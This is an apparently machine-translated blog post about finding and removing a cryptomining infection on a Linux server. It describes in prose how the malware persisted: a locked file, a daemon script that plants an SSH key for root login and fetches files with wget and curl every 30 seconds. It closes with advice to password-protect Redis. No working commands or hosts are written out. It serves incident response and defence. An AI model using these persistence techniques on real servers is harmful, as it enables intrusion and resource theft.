1. Recently, some people reported that the webpage was too busy to open, so I went to the server and used the top command to have a lookWe can see that a process with process number 6783 is consuming a lot of CPU. We run the following command to find the corresponding execution service based on the process numberWhen we see this thing, we know it’s a mining virus and here we kill it, and then we slowly unmask it. Execute the following command
Take a look at top
It doesn’t seem to be working. Let’s try deleting it
I do not have permission, but I am the root user, how can not have permission. There’s only one way to do it, the file is locked, so here we unlock the file,
Yum -y install e2fsprogs yum -y install e2fsprogs
The top to look at
The process still existsAnd then look at the corresponding execution,The display has been deleted. It’s still running, so there’s a daemon running in the background and here we see an abnormal.sh
So let’s download it, open it with nodeade ++,
So let’s see what I’ve highlighted in red, and that’s interesting. First, he set up a secret free login, which is root/.ssh. Then use wget and curl to download these files.
Let’s go online and locate this IP, and it turns out it’s a German, foreign site. Ping the domain name on the server
The parsed IP is the same, which means it’s the same address. The awkward thing here is that the suffix is de, and you can’t solve it with whois. Wanwang also does not support the resolution of this domain name. We’re going to have to start with the IP.
So here we see port 80, open, 443 not open. That is, HTTP is supported, not HTTPS. If you look at port 22,My wipe is also off.This code is executed every 30 seconds. Here is the script, and here is the public key for the cryptographic-free login.
Grant permissions to these files and cannot modify them. Let’s undo it all, delete it, and look at top’s command again
To sum up, you must set a password to set up Redis. Remember, remember, remember.